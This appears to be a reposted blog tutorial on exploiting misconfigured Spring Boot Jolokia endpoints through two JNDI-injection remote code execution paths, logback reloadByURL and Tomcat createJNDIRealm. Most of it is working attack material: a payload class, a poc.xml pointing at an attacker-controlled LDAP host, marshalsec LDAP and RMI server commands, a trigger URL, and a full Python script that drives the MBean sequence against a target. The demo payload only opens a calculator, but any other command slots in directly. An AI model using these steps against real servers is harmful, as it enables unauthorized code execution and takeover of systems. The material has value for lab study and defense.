Improper configuration of Spring Boot jolokia leads to RCE vulnerability

Disclaimer: This article is for learning and reference only. All resources involved in it are from the Internet. Please do not use them for any illegal acts, otherwise you will bear the corresponding consequences yourself, and I do not assume any legal and joint liability.

Vulnerability 1: jolokia logback JNDI RCE

build environment

The vulnerability environment is:
https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-jolokia-logback-rce

IDEA loads the source code and configures a Spring boot to run the environment

After the environment is running, visit the /jolokia interface

Conditions of use

The target website exists /jolokia or /actuator/jolokia interface
The target uses the jolokia-core dependency (version requirements are not yet known) and related MBean s exist in the environment
The target can request the attacker's HTTP server (the request can go out to the external network)
Common JNDI injection is affected by the target JDK version, jdk < 6u201/7u191/8u182/11.0.1(LDAP), but the related environment can be bypassed

How to use

1. View existing MBeans

Visit the /jolokia/list interface to see if there are ch.qos.logback.classic.jmx.JMXConfigurator and reloadByURL keywords


2. Prepare the Java code to be executed

Write the java code (Evil.java) used to verify the existence of the vulnerability

public class Evil{
    public Evil() throws Exception{
        Runtime.getRuntime().exec("calc.exe");
    }
}

Compile with a method compatible with lower versions of jdk:

javac -source 1.5 -target 1.5 Evil.java

Then copy the generated Evil.class file to the attacker VPS.

3. Managed xml files

Write the poc.xml file and put it in the same directory as the Evil.class file on the VPS

<configuration>
  <insertFromJNDI env-entry-name="ldap://your-vps-ip:1389/aaabbb" as="appName" />
</configuration>

In the poc.xml directory, use python to start a simple http service

python3 -m http.server 8080

4. Set up malicious ldap service

Download marshalsec (https://github.com/mbechler/marshalsec), and use the following command to set up the corresponding ldap service:

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://your-vps-ip:8080/#Evil 1389

5. Replace the actual your-vps-ip address to access the URL to trigger the vulnerability

/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/your-vps-ip!/poc.xml

The result is as follows, the calculator pops up, indicating that the exploit is successful

Vulnerability 2: jolokia Realm JNDI RCE

The vulnerability environment still uses the same environment as the vulnerability.

Conditions of use

The target website exists /jolokia or /actuator/jolokia interface
The target uses the jolokia-core dependency (version requirements are not yet known) and related MBean s exist in the environment
The target can request the attacker's server (the request can go out of the Internet)
Common JNDI injection is affected by the target JDK version, jdk < 6u141/7u131/8u121(RMI), but the related environment can be bypassed

How to use

1. View existing MBeans

Visit the /jolokia/list interface to see if there are type=MBeanFactory and createJNDIRealm keywords.

2. Prepare the Java code to be executed

This step is the same as the method of loophole 1, and will not be repeated here.

3. Hosting class files

In the Evil.class file directory on the VPS, start a simple http service

python3 -m http.server 8080

4. Set up malicious rmi service

Download marshalsec (https://github.com/mbechler/marshalsec), and use the following command to set up the corresponding rmi service:

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://your-vps-ip:8080/#Evil 1389

5. Send malicious payload

Modify the target address, RMI address, port and other information in the springboot-realm-jndi-rce.py script according to the actual situation, and then run it on the server controlled by yourself.

#!/usr/bin/env python3
# coding: utf-8
# Referer: https://ricterz.me/posts/2019-03-06-yet-another-way-to-exploit-spring-boot-actuators-via-jolokia.txt


import requests



url = 'http://192.168.8.14:9094/jolokia'


create_realm = {
    "mbean": "Tomcat:type=MBeanFactory",
    "type": "EXEC",
    "operation": "createJNDIRealm",
    "arguments": ["Tomcat:type=Engine"]
}

wirte_factory = {
    "mbean": "Tomcat:realmPath=/realm0,type=Realm",
    "type": "WRITE",
    "attribute": "contextFactory",
    "value": "com.sun.jndi.rmi.registry.RegistryContextFactory"
}

write_url = {
    "mbean": "Tomcat:realmPath=/realm0,type=Realm",
    "type": "WRITE",
    "attribute": "connectionURL",
    "value": "rmi://192.168.10.171:1389/Evil"
}

stop = {
    "mbean": "Tomcat:realmPath=/realm0,type=Realm",
    "type": "EXEC",
    "operation": "stop",
    "arguments": []
}

start = {
    "mbean": "Tomcat:realmPath=/realm0,type=Realm",
    "type": "EXEC",
    "operation": "start",
    "arguments": []
}

flow = [create_realm, wirte_factory, write_url, stop, start]

for i in flow:
    print('%s MBean %s: %s ...' % (i['type'].title(), i['mbean'], i.get('operation', i.get('attribute'))))
    r = requests.post(url, json=i)
    r.json()
    print(r.status_code)

Execute python3 springboot-realm-jndi-rce.py on VPS

A calculator pops up on the target machine, and the exploit is successful

Tags: Java Back-end Spring Boot

Posted by cool30 on Fri, 17 Mar 2023 10:08:11 +1030